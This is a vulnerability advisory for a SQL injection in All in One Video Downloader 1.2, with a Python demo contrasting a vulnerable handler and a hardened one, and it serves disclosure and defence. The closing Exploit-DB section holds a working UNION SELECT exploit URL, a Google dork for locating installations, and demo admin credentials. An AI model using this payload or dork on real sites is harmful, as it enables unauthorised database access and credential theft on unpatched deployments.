Vendor: All in One Video Downloader
By: Deyaa Muhammad
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: All in One Video Downloader
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:niche_office:all_in_one_video_downloader
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WIN7_x68/cloudflare
2019

All in One Video Downloader 1.2 – SQL Injection

All in One Video Downloader 1.2 is vulnerable to SQL injection. An attacker can exploit it to retrieve sensitive information such as user credentials, the database name and the database version. The flaw is reached by sending a crafted SQL fragment in the 'id' parameter of the admin panel's 'view=page-edit' page; a UNION SELECT appended to that parameter returns attacker-chosen columns from the database in the page response.

Mitigation:

Input validation prevents this class of SQL injection attack: all user-supplied input, including the 'id' parameter, should be validated and filtered before it is used in a SQL query.
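As an added illustration (not code from the product or from the advisory), the following Python/SQLite model shows the pattern the advisory describes, a 'view=page-edit' handler that splices the 'id' parameter into its query, beside a hardened handler that validates the id as an integer and binds it as a query parameter. The table names, columns and rows are constructed for the demo and are not the product's real schema.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the application's database (hypothetical schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, email TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                     [(1, "Home", "..."), (2, "About", "...")])
    conn.execute("INSERT INTO users VALUES (1, 'admin@example.invalid', '$2y$10$hash')")
    return conn


def vulnerable_page_edit(conn, raw_id):
    # The anti-pattern behind the advisory: the 'id' query parameter is
    # concatenated straight into the SQL text, so a quote in the value
    # ends the literal and the rest is executed as SQL.
    sql = f"SELECT id, title, body FROM pages WHERE id='{raw_id}'"
    return conn.execute(sql).fetchall()


def hardened_page_edit(conn, raw_id):
    # Validate: a page id is a plain integer; anything else (including
    # "2.9" and any value carrying quotes or SQL keywords) is rejected.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("invalid id")
    # Parameterize: the value is bound by the driver, never spliced into
    # the statement, so it can only ever be compared as data.
    return conn.execute("SELECT id, title, body FROM pages WHERE id=?",
                        (int(raw_id),)).fetchall()


def demo():
    # Same shape as the advisory's PoC (quote, UNION SELECT, comment),
    # adapted to the constructed three-column table.
    conn = make_db()
    payload = "2.9' UNION SELECT id, email, password_hash FROM users-- -"
    leaked = vulnerable_page_edit(conn, payload)
    try:
        hardened_page_edit(conn, payload)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    rows, blocked = demo()
    print("vulnerable handler returned:", rows)
    print("hardened handler rejected payload:", blocked)
```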

Exploit-DB raw data:

# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
# Google Dork: "developed by Niche Office"
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://nicheoffice.web.tr/
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
# Demo Website: https://aiovideodl.ml/
# Demo Admin Panel: https://aiovideodl.ml/admin/
# Demo Admin Credentials: demo@aiovideodl.ml/123456
# Version: 1.2
# Tested on: WIN7_x68/cloudflare
# CVE : N/A

# POC:
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -

# Exploit:
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -